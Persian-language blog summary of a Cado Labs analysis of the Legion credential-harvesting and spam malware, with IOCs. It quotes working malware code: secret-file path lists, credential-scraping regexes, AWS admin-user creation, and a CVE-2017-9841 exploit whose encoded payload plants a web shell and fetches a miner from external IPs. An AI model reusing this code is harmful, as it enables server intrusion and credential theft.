بدافزار Legion ابزاری برای جمع آوری اعتبارنامه های AWS و ارسال هرزنامه

زمان مطالعه: 8 دقیقه

محققای Cado Labs یه گزارشی از یه اسکریپت مبتنی بر پایتون بنام Legion منتشر کردن که با هدف جمع آوری اعتبارنامه ها از سرویس های مختلف و سوء استفاده از SMTPها توسعه داده شده.

این ابزار از طریق تلگرام به فروش میرسه و دارای ماژولهای زیر هستش :

جمع آوری سرورهای SMTP آسیب پذیر
اجرای اکسپلویتهای RCE
اکسپلویت نسخه های آسیب پذیر آپاچی
بروت فورس روی اکانتهای cPanel و WHM
جمع آوری لیست اهداف از طریق API های شودان ( باید API key داشته باشید)
یسری ابزارهای دیگه که عمدتا برای سوء استفاده از سرویس های AWS هستش.

در دسامبر 2022 ، Lacework مطلبی در خصوص یه خانواده بدافزار بنام AndroxGh0st نوشته بود، محققا اعلام کردن که این ابزار هم مرتبط با AndroxGh0st هستش . یه بررسی هم Ian Ahl از این ابزار داشته. در زمان نگارش مقاله ، هیچ آنتی ویروسی در VT بعنوان فایل مخرب شناسایش نمی کرده.

این ابزار یه اسکریپت با 21015 خط کد هستش و در پایتون 3 توسعه داده شده. آنالیز استاتیک اون نشون میده که از سرویس های شودان و Twilio استفاده میکنه و همچنین قابلیت ارسال نتایج هر یک از ماژولهاش به تلگرام رو هم داره.

cfg['SETTINGS'] = {}
   cfg['SETTINGS']['EMAIL_RECEIVER'] = 'put your email'
   cfg['SETTINGS']['DEFAULT_TIMEOUT'] = '20'
   cfg['TELEGRAM'] = {}
   cfg['TELEGRAM']['TELEGRAM_RESULTS'] = 'on'
   cfg['TELEGRAM']['BOT_TOKEN'] = 'bot token telegram'
   cfg['TELEGRAM']['CHAT_ID'] = 'chat id telegram'
   cfg['SHODAN'] = {}
   cfg['SHODAN']['APIKEY'] = 'ADD YOUR SHODAN APIKEY'
   cfg['TWILIO'] = {}
   cfg['TWILIO']['TWILIOAPI'] = 'ADD YOUR TWILIO APIKEY'
   cfg['TWILIO']['TWILIOTOKEN'] = 'ADD YOUR TWILIO AUTHTOKEN'
   cfg['TWILIO']['TWILIOFROM'] = 'ADD YOUR FROM NUMBER'
   cfg['SCRAPESTACK'] = {}
   cfg['SCRAPESTACK']['SCRAPESTACK_KEY'] = 'scrapestack_key'
   cfg['AWS'] = {}
   cfg['AWS']['EMAIL'] = 'put your email AWS test'

cfg['SETTINGS'] = {}

cfg['SETTINGS']['EMAIL_RECEIVER'] = 'put your email'

cfg['SETTINGS']['DEFAULT_TIMEOUT'] = '20'

cfg['TELEGRAM'] = {}

cfg['TELEGRAM']['TELEGRAM_RESULTS'] = 'on'

cfg['TELEGRAM']['BOT_TOKEN'] = 'bot token telegram'

cfg['TELEGRAM']['CHAT_ID'] = 'chat id telegram'

cfg['SHODAN'] = {}

cfg['SHODAN']['APIKEY'] = 'ADD YOUR SHODAN APIKEY'

cfg['TWILIO'] = {}

cfg['TWILIO']['TWILIOAPI'] = 'ADD YOUR TWILIO APIKEY'

cfg['TWILIO']['TWILIOTOKEN'] = 'ADD YOUR TWILIO AUTHTOKEN'

cfg['TWILIO']['TWILIOFROM'] = 'ADD YOUR FROM NUMBER'

cfg['SCRAPESTACK'] = {}

cfg['SCRAPESTACK']['SCRAPESTACK_KEY'] = 'scrapestack_key'

cfg['AWS'] = {}

cfg['AWS']['EMAIL'] = 'put your email AWS test'

این ابزار از طریق یه گروه تلگرامی منتشر شده و اگه اسکریپت رو اجرا کنیم ،یه نام کاربری تلگرامی با نام myl3gion داخلش هستش. محققا تونستن به این گروه تلگرامی وارد بشن و متوجه شدن که مالک اسکریپت هشداری در خصوص کلاهبردار بود myl3gion داده. با این اوصاف به نظر این نسخه ای که محققا روش آنالیز رو انجام میدن ، بصورت غیر قانونی توسط این کاربر منتشر شده.

در زمان نگارش این مقاله، این گروه 1090 عضو داشته و اولین پیام مربوط به فوریه 2021 هستش. محققا همچنین یه کانال یوتیوبی با نام Forza Tools مشاهده کردن که توش آموزش هایی از نحوه استفاده از این ابزار بوده. تلاشی که برای ساخت این ویدیوها توسط توسعه دهنده انجام شده، نشون میده که این بدافزار بطور گسترده در حال استفاده هستش و یه بدافزار تجاری هستش.

با بررسی که در کدهای بدافزار داشتن، با کامنتهایی مواجه شدن که به زبان اندونزییایی هستش . همچنین در یه کدی که برای اکسپلویت PHP استفاده میشه به یه Github Gist با کاربری بنام Galeh Rizky لینک داده شده که در اندونزی هستش. براساس این شواهد احتمال میدن که توسعه دهنده یا اندونزیایی هستش یا در اونجا مستقر هستش و شاید توسعه دهنده خوده Galeh Rizky باشه.

قابلیت بدافزار:

با بررسی کدها و ویدیوهای کانال یوتیوبشون محققا متوجه شدن که این ابزار عمدتا از طریق اکسپلویت وب سرورهایی که روشون CMS ، PHP و یا فریمورک های مبتنی بر PHP مثله لاراول در حال اجراست ، اقدام به جمع آوری اعتبارنامه ها میکنه.

بعد از اکسپلویت از طریق الگوهای Regex که داره اعتبارنامه هارو بدست میاره. این الگو شامل اعتبارنامه های ارائه دهندگان ایمیل ، ارائه دهندگان سرویس های ابری ، سیستم مدیریت سرور ، دیتابیس و سیستم های پرداخت مثله پی پال هستش. معمولا این ابزار برای جمع آوری اعتبارنامه ها و استفاده از اونها در کمپین های فیشینگ و اسپم مورد استفاده قرار میگیره.

همچنین امکان استقرار وب شل، بروت فورس اکانتهای CPanel یا AWS و همچنین ارسال پیامک به شماره های آمریکا که بصورت داینامیک ایجاد میشن، رو داره.

جمع آوری اعتبارنامه ها :

این ابزار شامل روش های مختلفی برای جمع آوری اعتبارنامه ها از وب سرورهایی که به درستی پیکربندی نشدن، هستش. براساس نرم افزار وب سرور، زبان و فریمورکی که روش اجرا میشه، بدافزار درخواستهایی به منابع مشخصی که حاوی اطلاعات حساس هستش، ارسال میکنه و بعد از تجزیه و تحلیلشون، اونارو براساس هر سرویس در فایلهایی ذخیره میکنه.

مثلا یکی از این منابع مشخص فایلهای .env هستش که اطلاعات حساسی رو در خصوص محصولات لاراولی داره. بدافزار یه لیستی از مسیرهایی که این فایل میتونه باشه رو داره و با بررسی اونا در تارگت، اطلاعات حساس این فایلها رو بدست میاره. جدول زیر نمونه هایی از این منابع مشخص رو لیست کرده:

Apache	Laravel	Generic Debug Paths
/_profiler/phpinfo	/conf/.env	/debug/default/view?panel=config
/tool/view/phpinfo.view.php	/wp-content/.env	/tool/view/phpinfo.view.php
/debug/default/view.html	/library/.env	/debug/default/view.html
/frontend/web/debug/default/view	/vendor/.env	/frontend/web/debug/default/view
/.aws/credentials	/api/.env	/web/debug/default/view
/config/aws.yml	/laravel/.env	/sapi/debug/default/view
/symfony/public/_profiler/phpinfo	/sites/all/libraries/mailchimp/.env	/wp-config.php-backup

کد زیر نمونه ای از تجزیه regex برای بدست آوردن اعتبارنامه های دیتابیس توسط این ابزار هستش:

# grab password
if 'DB_USERNAME=' in text:
        method = './env'
        db_user = re.findall("\nDB_USERNAME=(.*?)\n", text)[0]
        db_pass = re.findall("\nDB_PASSWORD=(.*?)\n", text)[0]
elif '<td>DB_USERNAME</td>' in text:
        method = 'debug'
        db_user = re.findall('<td>DB_USERNAME<\/td>\s+<td><pre.*>(.*?)<\/span>', text)[0]
        db_pass = re.findall('<td>DB_PASSWORD<\/td>\s+<td><pre.*>(.*?)<\/span>', text)[0]

# grab password

if 'DB_USERNAME=' in text:

method = './env'

db_user = re.findall("\nDB_USERNAME=(.*?)\n", text)[0]

db_pass = re.findall("\nDB_PASSWORD=(.*?)\n", text)[0]

elif '<td>DB_USERNAME</td>' in text:

method = 'debug'

db_user = re.findall('<td>DB_USERNAME<\/td>\s+<td><pre.*>(.*?)<\/span>', text)[0]

db_pass = re.findall('<td>DB_PASSWORD<\/td>\s+<td><pre.*>(.*?)<\/span>', text)[0]

کد زیر نمونه ای از تجزیه regex برای بدست آوردن اعتبارنامه های Twilio توسط این ابزار هستش:

if '<td>#TWILIO_SID</td>' in text:
                  acc_sid = re.findall('<td>#TWILIO_SID<\\/td>\\s+<td><pre.*>(.*?)<\\/span>', text)[0]
                  auhtoken = re.findall('<td>#TWILIO_AUTH<\\/td>\\s+<td><pre.*>(.*?)<\\/span>', text)[0]
                  build = cleanit(url + '|' + acc_sid + '|' + auhtoken)
                  remover = str(build).replace('\r', '')
                  print(f"{yl}☆ [{gr}{ntime()}{red}] {fc}╾┄╼ {gr}TWILIO {fc}[{yl}{acc_sid}{res}:{fc}{acc_key}{fc}]")
                  save = open(o_twilio, 'a')
                  save.write(remover+'\n')
                  save.close()

if '<td>#TWILIO_SID</td>' in text:

acc_sid = re.findall('<td>#TWILIO_SID<\\/td>\\s+<td><pre.*>(.*?)<\\/span>', text)[0]

auhtoken = re.findall('<td>#TWILIO_AUTH<\\/td>\\s+<td><pre.*>(.*?)<\\/span>', text)[0]

build = cleanit(url + '|' + acc_sid + '|' + auhtoken)

remover = str(build).replace('\r', '')

print(f"{yl}☆ [{gr}{ntime()}{red}] {fc}╾┄╼ {gr}TWILIO {fc}[{yl}{acc_sid}{res}:{fc}{acc_key}{fc}]")

save = open(o_twilio, 'a')

save.write(remover+'\n')

save.close()

جدول زیر هم لیستی از سرویس هایی هستش که این ابزار اعتبارنامه هارو براشون در میاره :

Services Targeted

Twilio

Nexmo

Stripe/Paypal (payment API function)

AWS console credentials

AWS SNS, S3 and SES specific credentials

Mailgun

Plivo

Clicksend

Mandrill

Mailjet

MessageBird

Vonage

Nexmo

Exotel

Onesignal

Clickatel

Tokbox

SMTP credentials

Database Administration and CMS credentials (CPanel, WHM, PHPmyadmin)

ویژگی های AWS :

این ابزار نه تنها میتونه اعتبارنامه های AWS رو از سایتهای هدف استخراج کنه، از طریق یه تابعی بنام aws_generator امکان بروت فورس اعتبارنامه های AWS رو هم داره.

def aws_generator(self, length, region):
    chars = ["a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z","0","1","2","3","4","5","6","7","8","9","/","/"]
    chars = ["a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z","0","1","2","3","4","5","6","7","8","9"]
    def aws_id():
        output = "AKIA"
        for i in range(16):
            output += random.choice(chars[0:38]).upper()
        return output
    def aws_key():
        output = ""
        for i in range(40):
            if i == 0 or i == 39:
                randUpper = random.choice(chars[0:38]).upper()
                output += random.choice([randUpper, random.choice(chars[0:38])])
            else:
                randUpper = random.choice(chars[0:38]).upper()
                output += random.choice([randUpper, random.choice(chars)])
        return output
    self.show_info_message(message="Generating Total %s Of AWS Key, Please Wait....." % length)

def aws_generator(self, length, region):

chars = ["a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z","0","1","2","3","4","5","6","7","8","9","/","/"]

chars = ["a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z","0","1","2","3","4","5","6","7","8","9"]

def aws_id():

output = "AKIA"

for i in range(16):

output += random.choice(chars[0:38]).upper()

return output

def aws_key():

output = ""

for i in range(40):

if i == 0 or i == 39:

randUpper = random.choice(chars[0:38]).upper()

output += random.choice([randUpper, random.choice(chars[0:38])])

else:

randUpper = random.choice(chars[0:38]).upper()

output += random.choice([randUpper, random.choice(chars)])

return output

self.show_info_message(message="Generating Total %s Of AWS Key, Please Wait....." % length)

این کد با آنالیزی که Lacework روی AndroxGh0st انجام داده مطابقت داره و طبق نظر اونا، این روش از لحاظ آماری بعیده که اعتبارنامه ای بده که قابل استفاده باشه. این ابزاز یه همچین کدی رو برای بروت فورس سرویس ایمیل مارکتینگ SendGrid هم داره.

صرف نظر از اینکه چطوری اعتبارنامه ها رو بدست میاره، بدافزار یه کاربر IAM با نام کاربری ses_legion و تگ Owner و مقدار ms.boharas اضافه میکنه.

def create_new_user(iam_client, user_name='ses_legion'):
        user = None
        try:
                user = iam_client.create_user(
                        UserName=user_name,
                        Tags=[{'Key': 'Owner', 'Value': 'ms.boharas'}]
                    )
        except ClientError as e:
                if e.response['Error']['Code'] == 'EntityAlreadyExists':
                        result_str = get_random_string()
                        user_name = 'ses_{}'.format(result_str)
                        user = iam_client.create_user(UserName=user_name,
                        Tags=[{'Key': 'Owner', 'Value': 'ms.boharas'}]
                    )
        return user_name, user

def create_new_user(iam_client, user_name='ses_legion'):

user = None

try:

user = iam_client.create_user(

UserName=user_name,

Tags=[{'Key': 'Owner', 'Value': 'ms.boharas'}]

)

except ClientError as e:

if e.response['Error']['Code'] == 'EntityAlreadyExists':

result_str = get_random_string()

user_name = 'ses_{}'.format(result_str)

user = iam_client.create_user(UserName=user_name,

Tags=[{'Key': 'Owner', 'Value': 'ms.boharas'}]

)

return user_name, user

بعدش یه گروه IAM بنام SESADminGroup ایجاد میکنه و کاربر ایجاد کرده رو بهش اضافه میکنه. بعدش یسری خط مشی مبتنی بر AdministratorAccess آمازون ایجاد میکنه. این خط مشی دسترسی کامل میده و میشه همه پرمیشن هارو به همه سرویس ها و منابع داخل AWS داد.

def creat_new_group(iam_client, group_name='SESAdminGroup'):
        try:
                res = iam_client.create_group(GroupName=group_name)
        except ClientError as e:
                if e.response['Error']['Code'] == 'EntityAlreadyExists':
                        result_str = get_random_string()
                        group_name = "SESAdminGroup{}".format(result_str)
                        res = iam_client.create_group(GroupName=group_name)
        return res['Group']['GroupName']

def creat_new_policy(iam_client, policy_name='AdministratorAccess'):
        policy_json = {"Version": "2012-10-17","Statement":
        [{"Effect": "Allow", "Action": "*","Resource": "*"}]}
        try:
                res = iam_client.create_policy(
                        PolicyName=policy_name,
                        PolicyDocument=json.dumps(policy_json)
                        )
        except ClientError as e:
                if e.response['Error']['Code'] == 'EntityAlreadyExists':
                        result_str = get_random_string()
                        policy_name = "AdministratorAccess{}".format(result_str)
                        res = iam_client.create_policy(PolicyName=policy_name,
                                PolicyDocument=json.dumps(policy_json)
                                )
        return res['Policy']['Arn']

def creat_new_group(iam_client, group_name='SESAdminGroup'):

try:

res = iam_client.create_group(GroupName=group_name)

except ClientError as e:

if e.response['Error']['Code'] == 'EntityAlreadyExists':

result_str = get_random_string()

group_name = "SESAdminGroup{}".format(result_str)

res = iam_client.create_group(GroupName=group_name)

return res['Group']['GroupName']

def creat_new_policy(iam_client, policy_name='AdministratorAccess'):

policy_json = {"Version": "2012-10-17","Statement":

[{"Effect": "Allow", "Action": "*","Resource": "*"}]}

try:

res = iam_client.create_policy(

PolicyName=policy_name,

PolicyDocument=json.dumps(policy_json)

)

except ClientError as e:

if e.response['Error']['Code'] == 'EntityAlreadyExists':

result_str = get_random_string()

policy_name = "AdministratorAccess{}".format(result_str)

res = iam_client.create_policy(PolicyName=policy_name,

PolicyDocument=json.dumps(policy_json)

)

return res['Policy']['Arn']

با توجه به اینکه بدافزار اصل کارش کرک سرویس های ایمیل هستش، در ادامه محدودیت میزان ارسال ایمیل در Amazon Simple Email Service (SES) رو برای کاربر تازه ایجاد کرده بررسی میکنه و یه ایمیل هم تستی ارسال میکنه.

def check(countsd, key, secret, region):
        try:
                out = ''
                client = boto3.client('ses', aws_access_key_id=key, aws_secret_access_key=secret, region_name=region)
                try:
                        response = client.get_send_quota()
                        frommail = client.list_identities()['Identities']
                        if frommail:
                                SUBJECT = "AWS Checker By @mylegion (Only Private Tools)"
                                BODY_TEXT = "Region: {region}\r\nLimit: {limit}|{maxsendrate}|{last24}\r\nLegion PRIV8 Tools\r\n".format(key=key, secret=secret, region=region, limit=response['Max24HourSend'])
                                CHARSET = "UTF-8"
                                _to = emailnow

def check(countsd, key, secret, region):

try:

out = ''

client = boto3.client('ses', aws_access_key_id=key, aws_secret_access_key=secret, region_name=region)

try:

response = client.get_send_quota()

frommail = client.list_identities()['Identities']

if frommail:

SUBJECT = "AWS Checker By @mylegion (Only Private Tools)"

BODY_TEXT = "Region: {region}\r\nLimit: {limit}|{maxsendrate}|{last24}\r\nLegion PRIV8 Tools\r\n".format(key=key, secret=secret, region=region, limit=response['Max24HourSend'])

CHARSET = "UTF-8"

_to = emailnow

ارسال پیامک :

یکی از قابلیت های این بدافزار امکان ارسال پیامک اسپم به کاربران اپراتورهای شبکه های تلفن همراه آمریکاست. برای این کار ، بدافزار کد ایالتی که کاربر انتخاب کرده رو از طریق سایت www.randomphonenumbers.com و با استفاده از کتابخونه BeautifulSoup HTML بدست میاره. بعدش با استفاده از تابعی که اعداد مختلف رو بصورت رندوم میسازه ، شماره تلفن ایجاد میکنه.

def generate(self):
    print('\n\n\t{0}╭╼[ {1}Starting Service {0}]\n\t│'.format(fg[5], fg[6]))
    url = f'https://www.randomphonenumbers.com/US/random_{self.state}_phone_numbers'.replace(' ', '%20')
    print('\t{0}│ [ {1}WEBSITE LOADED{0} ] {2}{3}{0}'.format(fg[5], fg[2], fg[1], url))
    query = requests.get(url)
    soup = BeautifulSoup(query.text, 'html.parser')
    list = soup.find_all('ul')[2]
    urls = []
    for a in list.find_all('a', href=True):
        url = f'https://www.randomphonenumbers.com{a["href"]}'
        print('\t{0}│ [ {1}PARSING URLS{0}   ] {2}{3}'.format(fg[5], fg[2], fg[1], url), end='\r')
        urls.append(url)
        time.sleep(0.01)
    print(' ' * 100, end='\r')
    print('\t{0}│ [ {1}URLS PARSED{0}    ] {2}{3}\n\t│'.format(fg[5], fg[3], fg[1], len(urls)), end='\r')

    def generate_number(area_code, carrier):
        for char in string.punctuation:
            carrier = carrier.replace(char, ' ')
        numbers = ''
        for number in [area_code + str(x) for x in range(0000, 9999)]:
            if len(number) != 10:
                gen = number.split(area_code)[1]
                number = area_code + str('0' * (10-len(area_code)-len(gen))) + gen
            numbers += number + '\n'
        with open(f'Generator/Carriers/{carrier}.txt', 'a+') as file:
            file.write(numbers)

def generate(self):

print('\n\n\t{0}╭╼[ {1}Starting Service {0}]\n\t│'.format(fg[5], fg[6]))

url = f'https://www.randomphonenumbers.com/US/random_{self.state}_phone_numbers'.replace(' ', '%20')

print('\t{0}│ [ {1}WEBSITE LOADED{0} ] {2}{3}{0}'.format(fg[5], fg[2], fg[1], url))

query = requests.get(url)

soup = BeautifulSoup(query.text, 'html.parser')

list = soup.find_all('ul')[2]

urls = []

for a in list.find_all('a', href=True):

url = f'https://www.randomphonenumbers.com{a["href"]}'

print('\t{0}│ [ {1}PARSING URLS{0} ] {2}{3}'.format(fg[5], fg[2], fg[1], url), end='\r')

urls.append(url)

time.sleep(0.01)

print(' ' * 100, end='\r')

print('\t{0}│ [ {1}URLS PARSED{0} ] {2}{3}\n\t│'.format(fg[5], fg[3], fg[1], len(urls)), end='\r')

def generate_number(area_code, carrier):

for char in string.punctuation:

carrier = carrier.replace(char, ' ')

numbers = ''

for number in [area_code + str(x) for x in range(0000, 9999)]:

if len(number) != 10:

gen = number.split(area_code)[1]

number = area_code + str('0' * (10-len(area_code)-len(gen))) + gen

numbers += number + '\n'

with open(f'Generator/Carriers/{carrier}.txt', 'a+') as file:

file.write(numbers)

برای ارسال پیامک ، اعتبارنامه‌های ذخیره شده SMTP رو که توسط یکی از ماژول‌های جمع‌آوری اعتبار ، استخراج میشه رو بررسی میکنه. جدول زیر اپراتورهای هدف این بدافزار رو مشاهده میکنید.

US Mobile Carriers

Alltel

Amp’d Mobile

AT&T

Boost Mobile

Cingular

Cricket

Einstein PCS

Sprint

SunCom

T-Mobile

VoiceStream

US Cellular

Verizon

Virgin

while not is_prompt:
    print('\t{0}┌╼[{1}USA SMS Sender{0}]╾╼[{2}Choose Carrier to SPAM{0}]\n\t└─╼ '.format(fg[5], fg[0], fg[6]), end='')
    try:
        prompt = int(input(''))
        if prompt in [int(x) for x in carriers.keys()]:
            self.carrier = carriers[str(prompt)]
            is_prompt = True
        else:
            print('\t{0}[{1}!{0}]╾╼[{2}Please enter a valid choice!{0}]'.format(fg[5], fg[0], fg[2]), end='\r')
            time.sleep(1)
    except ValueError:
        print('\t{0}[{1}!{0}]╾╼[{2}Please enter a valid choice!{0}]'.format(fg[5], fg[0], fg[2]), end='\r')
        time.sleep(1)
print('\t{0}┌╼[{1}USA SMS Sender{0}]╾╼[{2}Please enter your message {0}| {2}160 Max Characters{0}]\n\t└─╼ '.format(fg[5], fg[0], fg[6]), end='')
self.message = input('')
print('\t{0}┌╼[{1}USA SMS Sender{0}]╾╼[{2}Please enter sender email{0}]\n\t└─╼ '.format(fg[5], fg[0], fg[6]), end='')
self.sender_email = input('')

while not is_prompt:

print('\t{0}┌╼[{1}USA SMS Sender{0}]╾╼[{2}Choose Carrier to SPAM{0}]\n\t└─╼ '.format(fg[5], fg[0], fg[6]), end='')

try:

prompt = int(input(''))

if prompt in [int(x) for x in carriers.keys()]:

self.carrier = carriers[str(prompt)]

is_prompt = True

else:

print('\t{0}[{1}!{0}]╾╼[{2}Please enter a valid choice!{0}]'.format(fg[5], fg[0], fg[2]), end='\r')

time.sleep(1)

except ValueError:

print('\t{0}[{1}!{0}]╾╼[{2}Please enter a valid choice!{0}]'.format(fg[5], fg[0], fg[2]), end='\r')

time.sleep(1)

print('\t{0}┌╼[{1}USA SMS Sender{0}]╾╼[{2}Please enter your message {0}| {2}160 Max Characters{0}]\n\t└─╼ '.format(fg[5], fg[0], fg[6]), end='')

self.message = input('')

print('\t{0}┌╼[{1}USA SMS Sender{0}]╾╼[{2}Please enter sender email{0}]\n\t└─╼ '.format(fg[5], fg[0], fg[6]), end='')

self.sender_email = input('')

اکسپلویت PHP:

بدافزار علاوه بر جمع آوری اعتبارنامه ها، ارسال ایمیل و پیامک اسپم، قابلیت اکسپلویت آسیب پذیری های PHP برای استقرار وب شل و اجرای کد دلخواه رو داره. برای این کار هم از روشهای مختلفی استفاده میکنه. یکی از این روشها ارسال یه رشته که با <?php شروع میشه و در ادامه کدهای PHP که با base64 انکد شدن به مسیر زیر هستش :

/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

1	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

این روش یه آسیب پذیری با شناسه CVE-2017-9841 هستش که امکان اجرای کد PHP بدون احراز هویت به مهاجم میده. بدافزار از POC این آسیب پذیری در کدهاش استفاده کرده.

path = "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
url = url + path
phpinfo = "<?php phpinfo(); ?>"
try:
    requester_1 = requests.post(url, data=phpinfo, timeout=15, verify=False)
    if "phpinfo()" in requester_1.text:
        payload_ = '<?php $root = $_SERVER["DOCUMENT_ROOT"]; $myfile = fopen($root . "/'+pathname+'", "w") or die("Unable to open file!"); $code = "PD9waHAgZWNobyAnPGNlbnRlcj48aDE+TEVHSU9OIEVYUExPSVQgVjQgKE7Eg3ZvZGFyaSBQb3dlcik8L2gxPicuJzxicj4nLidbdW5hbWVdICcucGhwX3VuYW1lKCkuJyBbL3VuYW1lXSAnO2VjaG8nPGZvcm0gbWV0aG9kPSJwb3N0ImVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiPic7ZWNobyc8aW5wdXQgdHlwZT0iZmlsZSJuYW1lPSJmaWxlIj48aW5wdXQgbmFtZT0iX3VwbCJ0eXBlPSJzdWJtaXQidmFsdWU9IlVwbG9hZCI+PC9mb3JtPic7aWYoICRfUE9TVFsnX3VwbCddPT0iVXBsb2FkIil7aWYoQGNvcHkoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddLCRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSl7ZWNobyc8Yj5MRUdJT04gRXhwbG9pdCBTdWNjZXNzITwvYj4nO31lbHNle2VjaG8nPGI+TEVHSU9OIEV4cGxvaXQgU3VjY2VzcyE8L2I+Jzt9fSBzeXN0ZW0oJ2N1cmwgLXMgLWsgMi41Ny4xMjIuMTEyL3JjZS9sb2FkIC1vIGFkaW5kZXgucGhwOyBjZCAvdG1wOyBjdXJsIC1PIDkxLjIxMC4xNjguODAvbWluZXIuanBnOyB0YXIgeHp2ZiBtaW5lci5qcGcgPiAvZGV2L251bGw7IHJtIC1yZiBtaW5lci5qcGc7IGNkIC54OyAuL3ggPiAvZGV2L251bGwnKTsKPz4="; fwrite($myfile, base64_decode($code)); fclose($myfile); echo("LEGION EXPLOIT V3"); ?>'
        send_payload = requests.post(url, data=payload_, timeout=15, verify=False)
        if "LEGION EXPLOIT V3" in send_payload.text:
            status_exploit = "Successfully"
        else:
            status_exploit = "Can't exploit"
    else:
        status_exploit = "May not vulnerable"

path = "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"

url = url + path

phpinfo = "<?php phpinfo(); ?>"

try:

requester_1 = requests.post(url, data=phpinfo, timeout=15, verify=False)

if "phpinfo()" in requester_1.text:

payload_ = '<?php $root = $_SERVER["DOCUMENT_ROOT"]; $myfile = fopen($root . "/'+pathname+'", "w") or die("Unable to open file!"); $code = "PD9waHAgZWNobyAnPGNlbnRlcj48aDE+TEVHSU9OIEVYUExPSVQgVjQgKE7Eg3ZvZGFyaSBQb3dlcik8L2gxPicuJzxicj4nLidbdW5hbWVdICcucGhwX3VuYW1lKCkuJyBbL3VuYW1lXSAnO2VjaG8nPGZvcm0gbWV0aG9kPSJwb3N0ImVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiPic7ZWNobyc8aW5wdXQgdHlwZT0iZmlsZSJuYW1lPSJmaWxlIj48aW5wdXQgbmFtZT0iX3VwbCJ0eXBlPSJzdWJtaXQidmFsdWU9IlVwbG9hZCI+PC9mb3JtPic7aWYoICRfUE9TVFsnX3VwbCddPT0iVXBsb2FkIil7aWYoQGNvcHkoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddLCRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSl7ZWNobyc8Yj5MRUdJT04gRXhwbG9pdCBTdWNjZXNzITwvYj4nO31lbHNle2VjaG8nPGI+TEVHSU9OIEV4cGxvaXQgU3VjY2VzcyE8L2I+Jzt9fSBzeXN0ZW0oJ2N1cmwgLXMgLWsgMi41Ny4xMjIuMTEyL3JjZS9sb2FkIC1vIGFkaW5kZXgucGhwOyBjZCAvdG1wOyBjdXJsIC1PIDkxLjIxMC4xNjguODAvbWluZXIuanBnOyB0YXIgeHp2ZiBtaW5lci5qcGcgPiAvZGV2L251bGw7IHJtIC1yZiBtaW5lci5qcGc7IGNkIC54OyAuL3ggPiAvZGV2L251bGwnKTsKPz4="; fwrite($myfile, base64_decode($code)); fclose($myfile); echo("LEGION EXPLOIT V3"); ?>'

send_payload = requests.post(url, data=payload_, timeout=15, verify=False)

if "LEGION EXPLOIT V3" in send_payload.text:

status_exploit = "Successfully"

else:

status_exploit = "Can't exploit"

else:

status_exploit = "May not vulnerable"

IOCهای گزارش:

Filename	SHA256
legion.py	fcd95a68cd8db0199e2dd7d1ecc4b7626532681b41654519463366e27f54e65a
legion.py (variant)	42109b61cfe2e1423b6f78c093c3411989838085d7e6a5f319c6e77b3cc462f3

User Agents

Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36

Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50

Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36

Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36

Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36

Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36

Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36

منبع

قابلیت بدافزار:

جمع آوری اعتبارنامه ها :

ویژگی های AWS :

ارسال پیامک :

اکسپلویت PHP:

دیدگاهتان را بنویسید لغو پاسخ

پست های مرتبط

اصلاح دو آسیب پذیری در محصولات اپل

استخراج 2 میلیون ارز دیجیتال با ایجاد یک میلیون سرور مجازی

صنعت هسته ای چین هدف Bitter APT + فایلهای نمونه

گزارش عملکرد برنامه باگ بانتی گوگل برای سال 2022